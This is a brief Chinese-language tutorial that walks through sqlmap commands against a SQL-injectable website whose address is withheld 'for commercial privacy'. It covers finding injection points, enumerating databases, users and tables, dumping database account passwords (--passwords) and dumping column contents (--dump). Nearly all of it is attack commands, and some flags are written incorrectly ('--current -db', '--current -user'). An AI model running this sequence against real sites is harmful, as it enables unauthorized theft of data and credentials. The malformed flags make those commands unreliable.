测试地址:因为涉及商业隐私,这里就不列啦
我这里用的是windows,并没有用kali,所以需要使用sqlmap.py
1.Sqlmap.py -u "网址" 网址存在注入点
可以看出有三个注入点,底下还有其他系统或数据库信息
2.曝出数据库名称
--dbs
可以看出有三个数据库
3.查看web当前使用的数据库
--current -db
4.曝出web数据库使用账户
--current -user
5.列出数据库所有账户
--users
没截…
6.曝出数据库账号和密码
--passwords
没截…
7.列出数据库中的表
-D XX --tables
(-D:指定数据库名称
XX:数据库名称
--tables:列出该数据库的表)
8.列出表中的字段
-D XX -T YY --columns
(-D指数据库名称
XX指数据库
-T指要列出字段的表
YY指数据库中的表
--columns指字段)
9.曝字段内容
-D XX -T YY -C ”a,b,c” --dump
(-D指数据库名称
XX指数据库
-T指要列出字段的表
YY指数据库中的表
-C指定要曝的字段
--dump将结果导出)